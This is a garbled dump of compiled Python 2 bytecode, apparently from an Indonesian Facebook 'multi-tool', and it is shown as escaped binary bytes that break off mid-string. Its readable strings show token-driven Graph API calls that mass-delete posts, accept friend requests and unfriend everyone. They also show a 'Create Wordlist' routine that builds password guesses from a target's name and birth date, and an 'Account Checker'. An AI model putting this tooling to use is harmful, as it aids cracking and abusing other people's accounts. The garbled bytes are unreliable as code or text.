Error(\x18\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x16\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x11\x01\x00\x00R \x00\x00\x00t\t\x00\x00\x00komengrupR\x94\x00\x00\x00Rh\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00(\n\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00R/\x01\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\xf1\x00\x00\x00Rm\x00\x00\x00R\xa2\x00\x00\x00R0\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x15\x01\x00\x00 \x08\x00\x00sR\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x12\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01!\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xf5\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01yH\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00t\x04\x00j\x05\x00d\x04\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x06\x00j\x07\x00|\x01\x00j\x08\x00\x83\x01\x00}\x02\x00|\x02\x00d\x05\x00\x19}\x03\x00Wn7\x00\x04t\t\x00k\n\x00r\x8e\x00\x01\x01\x01d\x06\x00GHt\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01t\n\x00j\x0b\x00d\x08\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\r\x00GHd\t\x00|\x03\x00\x16GHt\x0e\x00d\n\x00\x83\x01\x00\x01d\x0b\x00d\x0c\x00\x14GHt\x04\x00j\x05\x00d\r\x00|\x00\x00\x17\x83\x01\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00j\x08\x00\x83\x01\x00}\x05\x00x\xed\x00|\x05\x00d\x0e\x00\x19D]\xe1\x00}\x06\x00|\x06\x00d\x0f\x00\x19}\x07\x00d\x10\x00}\x08\x00t\x04\x00j\x05\x00d\x11\x00|\x07\x00\x17d\x12\x00\x17|\x00\x00\x17\x83\x01\x00}\t\x00t\x06\x00j\x07\x00|\t\x00j\x08\x00\x83\x01\x00}\n\x00y3\x00|\n\x00d\x13\x00\x19d\x14\x00\x19}\x0b\x00d\x15\x00|\x07\x00d\x16\x00 j\x0f\x00d\x17\x00d\x18\x00\x83\x02\x00\x17d\x19\x00\x17d\x1a\x00\x17GHWq\xed\x00\x04t\x10\x00k\n\x00r\xa1\x01\x01\x01\x01d\x1b\x00|\x07\x00d\x16\x00 j\x0f\x00d\x17\x00d\x18\x00\x83\x02\x00\x17d\x19\x00\x17d\x1c\x00\x17GH|\x08\x00d\x08\x007}\x08\x00q\xed\x00\x04t\x04\x00j\x11\x00j\x12\x00k\n\x00r\xcd\x01\x01\x01\x01d\x1d\x00GHt\x13\x00d\x1e\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01q\xed\x00Xq\xed\x00Wd\x0b\x00d\x0c\x00\x14GHd\x1f\x00GHt\x13\x00d\x1e\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01d\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s)\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%ss"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mStart\x1b[1;97m ...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s0\x00\x00\x00https://graph.facebook.com/me/feed?access_token=Rl\x00\x00\x00Rj\x00\x00\x00i\x00\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x1c\x00\x00\x00?method=delete&access_token=t\x05\x00\x00\x00errort\x07\x00\x00\x00messages\x0f\x00\x00\x00\x1b[1;91m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nR%\x01\x00\x00s\x03\x00\x00\x00...s\x16\x00\x00\x00\x1b[1;91m] \x1b[1;95mFaileds\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97ms\x17\x00\x00\x00\x1b[1;92m] \x1b[1;96mDeleteds\x1b\x00\x00\x00\x1b[1;91m[!] Connection Errors\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mDone(\x15\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00t\t\x00\x00\x00TypeErrorRi\x00\x00\x00R\x01\x00\x00\x00R/\x00\x00\x00R\x11\x01\x00\x00(\x0c\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00namt\x03\x00\x00\x00lolRq\x00\x00\x00t\x03\x00\x00\x00asut\x04\x00\x00\x00asusR\xf1\x00\x00\x00Rj\x00\x00\x00t\x04\x00\x00\x00piroRk\x00\x00\x00t\x02\x00\x00\x00okR2\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x16\x01\x00\x00L\x08\x00\x00sJ\x00\x00\x00\x00\x01\r\x01\x03\x01\x15\x01\x13\x01\x12\x01\x0e\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\t\x01\n\x01\t\x01\x13\x01\x12\x01\x11\x01\n\x01\x06\x01\x1b\x01\x12\x01\x03\x01\x0e\x01%\x01\r\x01!\x01\r\x01\x13\x01\x05\x01\n\x01\x0f\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x91\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00d\x08\x00|\x01\x00\x17d\t\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00d\n\x00t\x0f\x00|\x03\x00d\x0b\x00\x19\x83\x01\x00k\x06\x00r\xda\x00d\x0c\x00GHt\t\x00d\r\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01n\x00\x00t\x11\x00d\x0e\x00\x83\x01\x00\x01d\x0f\x00d\x10\x00\x14GHx~\x00|\x03\x00d\x0b\x00\x19D]r\x00}\x04\x00t\n\x00j\x12\x00d\x11\x00|\x04\x00d\x12\x00\x19d\x13\x00\x19\x17d\x14\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0c\x00j\r\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00d\x15\x00t\x0f\x00|\x06\x00\x83\x01\x00k\x06\x00rY\x01d\x16\x00|\x04\x00d\x12\x00\x19d\x17\x00\x19\x17GHq\xf8\x00d\x18\x00|\x04\x00d\x12\x00\x19d\x17\x00\x19\x17GHq\xf8\x00Wd\x0f\x00d\x10\x00\x14GHd\x19\x00GHt\t\x00d\r\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01d\x00\x00S(\x1a\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s3\x00\x00\x00https://graph.facebook.com/me/friendrequests?limit=s\x0e\x00\x00\x00&access_token=s\x02\x00\x00\x00[]Rl\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;91m[!] No friend requests\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s&\x00\x00\x00https://graph.facebook.com/me/friends/t\x04\x00\x00\x00fromRj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R2\x01\x00\x00s \x00\x00\x00\x1b[1;97m[ \x1b[1;91mFailed\x1b[1;97m ] R0\x00\x00\x00s \x00\x00\x00\x1b[1;97m[ \x1b[1;92mAccept\x1b[1;97m ] s\x16\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mDone(\x13\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R\x17\x00\x00\x00R\x11\x01\x00\x00R \x00\x00\x00Rh\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\x07\x01\x00\x00R\x13\x00\x00\x00t\x03\x00\x00\x00gasRm\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x17\x01\x00\x00t\x08\x00\x00s:\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x1b\x01\x12\x01\x16\x01\x05\x01\n\x01\n\x01\n\x01\t\x01\x11\x01#\x01\x12\x01\x12\x01\x14\x02\x15\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHd\t\x00d\n\x00\x14GHyt\x00t\n\x00j\x0b\x00d\x0b\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x0c\x00j\r\x00|\x01\x00j\x0e\x00\x83\x01\x00}\x02\x00xH\x00|\x02\x00d\x0c\x00\x19D]<\x00}\x03\x00|\x03\x00d\r\x00\x19}\x04\x00|\x03\x00d\x0e\x00\x19}\x05\x00t\n\x00j\x0f\x00d\x0f\x00|\x05\x00\x17d\x10\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x11\x00|\x04\x00\x17GHq\xbd\x00WWn7\x00\x04t\x10\x00k\n\x00r\x11\x01\x01\x01\x01n\'\x00\x04t\x11\x00k\n\x00r7\x01\x01\x01\x01d\x12\x00GHt\x12\x00d\x13\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x14\x00GHt\x12\x00d\x13\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x19\x00\x00\x00\x1b[1;97mStop \x1b[1;91mCTRL+Ci*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00R0\x00\x00\x00Rj\x00\x00\x00s*\x00\x00\x00https://graph.facebook.com/me/friends?uid=s\x0e\x00\x00\x00&access_token=s!\x00\x00\x00\x1b[1;97m[\x1b[1;92m Deleted \x1b[1;97m] s\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mDone(\x14\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00deletet\n\x00\x00\x00IndexErrorR\x96\x00\x00\x00R/\x00\x00\x00R\x11\x01\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00R\x0e\x01\x00\x00R}\x00\x00\x00R\x13\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x18\x01\x00\x00\x95\x08\x00\x00s<\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\n\x01\x05\x01\t\x01\x03\x01\x13\x01\x12\x01\x11\x01\n\x01\n\x01\x19\x01\x11\x01\r\x00\x03\x01\r\x01\x05\x01\n\x01\x0b\x01\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s1\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Create Posts5\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Create Wordlists5\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Account Checkers7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m See my group lists3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Profile Guards*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00pilih_lain(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00lain\xb7\x08\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xbb\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xab\x00t\x07\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\x08\x00\x00\x00R/\x00\x00\x00R?\x01\x00\x00t\x06\x00\x00\x00statusR\xfb\x00\x00\x00t\n\x00\x00\x00check_akunt\x08\x00\x00\x00grupsayat\x05\x00\x00\x00guardR+\x00\x00\x00(\x01\x00\x00\x00t\x05\x00\x00\x00other(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R?\x01\x00\x00\xcb\x08\x00\x00s$\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00|\x01\x00d\x08\x00k\x02\x00r\xa3\x00d\t\x00GHt\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01n^\x00t\x0b\x00j\x0c\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00t\x10\x00d\r\x00\x83\x01\x00\x01d\x0e\x00d\x0f\x00\x14GHd\x10\x00|\x03\x00d\x11\x00\x19\x17GHt\t\x00d\n\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x00\x00S(\x12\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s.\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mType status \x1b[1;91m:\x1b[1;97m R\n\x00\x00\x00s\x19\x00\x00\x00\x1b[1;91m[!] Don\'t be emptys\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s7\x00\x00\x00https://graph.facebook.com/me/feed?method=POST&message=s\x0e\x00\x00\x00&access_token=s%\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mCreate \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97mRj\x00\x00\x00(\x11\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R@\x01\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00(\x04\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00msgt\x03\x00\x00\x00resR\x9e\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>RA\x01\x00\x00\xe1\x08\x00\x00s,\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\n\x02\x1b\x01\x12\x01\n\x01\t\x01\r\x01\n\x01c\x00\x00\x00\x00\x14\x00\x00\x00\xd0\x00\x00\x00C\x00\x00\x00s4\x05\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\xa4\x04t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHt\t\x00d\n\x00\x83\x01\x00}\x01\x00t\x02\x00|\x01\x00d\x0b\x00\x17d\x0c\x00\x83\x02\x00}\x02\x00t\t\x00d\r\x00\x83\x01\x00}\x03\x00t\t\x00d\x0e\x00\x83\x01\x00}\x04\x00t\t\x00d\x0f\x00\x83\x01\x00}\x05\x00t\t\x00d\x10\x00\x83\x01\x00}\x06\x00|\x06\x00d\x11\x00d\x12\x00!}\x07\x00|\x06\x00d\x12\x00d\x13\x00!}\x08\x00|\x06\x00d\x13\x00\x1f}\t\x00d\x08\x00d\t\x00\x14GHd\x14\x00GHt\t\x00d\x15\x00\x83\x01\x00}\n\x00t\t\x00d\x16\x00\x83\x01\x00}\x0b\x00t\t\x00d\x17\x00\x83\x01\x00}\x0c\x00t\n\x00d\x18\x00\x83\x01\x00\x01|\x0c\x00d\x11\x00d\x12\x00!}\r\x00|\x0c\x00d\x12\x00d\x13\x00!}\x0e\x00|\x0c\x00d\x13\x00\x1f}\x0f\x00|\x02\x00j\x0b\x00d\x19\x00|\x01\x00|\x04\x00|\x01\x00|\x03\x00|\x03\x00|\x01\x00|\x03\x00|\x04\x00|\x04\x00|\x01\x00|\x04\x00|\x03\x00|\x01\x00|\x01\x00|\x03\x00|\x03\x00|\x04\x00|\x04\x00|\x01\x00|\x05\x00|\x03\x00|\x05\x00|\x04\x00|\x05\x00|\x05\x00|\x05\x00|\x05\x00|\x01\x00|\x05\x00|\x03\x00|\x05\x00|\x04\x00|\x01\x00|\x06\x00|\x01\x00|\x07\x00|\x01\x00|\x08\x00|\x01\x00|\t\x00|\x03\x00|\x06\x00|\x03\x00|\x07\x00|\x03\x00|\x08\x00|\x03\x00|\t\x00|\x04\x00|\x06\x00|\x04\x00|\x07\x00|\x04\x00|\x08\x00|\x04\x00|\t\x00|\x05\x00|\x06\x00|\x05\x00|\x07\x00|\x05\x00|\x08\x00|\x05\x00|\t\x00|\x06\x00|\x01\x00|\x07\x00|\x01\x00|\x08\x00|\x01\x00|\t\x00|\x01\x00|\x06\x00|\x03\x00|\x07\x00|\x03\x00|\x08\x00|\x03\x00|\t\x00|\x03\x00|\x06\x00|\x04\x00|\x07\x00|\x04\x00|\x08\x00|\x04\x00|\t\x00|\x04\x00|\x06\x00|\x05\x00|\x07\x00|\x05\x00|\x08\x00|\x05\x00|\t\x00|\x05\x00|\x05\x00|\x05\x00|\x01\x00|\x07\x00|\x08\x00|\x01\x00|\x08\x00|\t\x00|\x07\x00|\x08\x00|\x07\x00|\t\x00|\x07\x00|\x07\x00|\x08\x00|\x07\x00|\x08\x00|\t\x00|\x08\x00|\x08\x00|\t\x00|\x07\x00|\t\x00|\x08\x00|\t\x00|\t\x00|\t\x00|\x08\x00|\x07\x00|\x01\x00|\x08\x00|\t\x00|\x03\x00|\x07\x00|\x08\x00|\x03\x00|\x08\x00|\t\x00|\x04\x00|\x07\x00|\x08\x00|\x04\x00|\x08\x00|\t\x00|\x05\x00|\x07\x00|\x08\x00|\x05\x00|\x08\x00|\t\x00|\x01\x00|\n\x00|\x01\x00|\x0b\x00|\x01\x00|\x0c\x00|\n\x00|\x06\x00|\n\x00|\x0b\x00|\n\x00|\x0c\x00|\x03\x00|\n\x00|\x03\x00|\x0b\x00|\x03\x00|\x0c\x00|\x04\x00|\n\x00|\x04\x00|\x0b\x00|\x04\x00|\x0c\x00|\x06\x00|\x0c\x00|\x0b\x00|\x01\x00|\x0b\x00|\x03\x00|\x0b\x00|\x04\x00|\x0b\x00|\x05\x00|\x0b\x00|\x0b\x00|\x0c\x00|\x01\x00|\x0c\x00|\x03\x00|\x0c\x00|\x04\x00|\x0c\x00|\x05\x00|\x0c\x00|\x0c\x00|\n\x00|\r\x00|\n\x00|\x0e\x00|\n\x00|\x0f\x00|\x0b\x00|\r\x00|\x0b\x00|\x0e\x00|\x0b\x00|\x0f\x00|\x0b\x00|\x0c\x00f\xce\x00\x16\x83\x01\x00\x01d\x11\x00}\x10\x00x5\x00|\x10\x00d\x1a\x00k\x00\x00r\x0e\x04|\x10\x00d\x06\x00\x17}\x10\x00|\x02\x00j\x0b\x00|\x01\x00t\x0c\x00|\x10\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\xda\x03Wd\x11\x00}\x11\x00x5\x00|\x11\x00d\x1a\x00k\x00\x00rL\x04|\x11\x00d\x06\x00\x17}\x11\x00|\x02\x00j\x0b\x00|\n\x00t\x0c\x00|\x11\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x18\x04Wd\x11\x00}\x12\x00x5\x00|\x12\x00d\x1a\x00k\x00\x00r\x8a\x04|\x12\x00d\x06\x00\x17}\x12\x00|\x02\x00j\x0b\x00|\x05\x00t\x0c\x00|\x12\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01qV\x04Wd\x11\x00}\x13\x00x5\x00|\x13\x00d\x1a\x00k\x00\x00r\xc8\x04|\x13\x00d\x06\x00\x17}\x13\x00|\x02\x00j\x0b\x00|\x0b\x00t\x0c\x00|\x13\x00\x83\x01\x00\x17d\x1b\x00\x17\x83\x01\x00\x01q\x94\x04W|\x02\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GHd\x1d\x00|\x01\x00\x16GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01Wn)\x00\x04t\x04\x00k\n\x00r/\x05\x01}\x06\x00\x01d\x1f\x00GHt\t\x00d\x1e\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S( \x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not 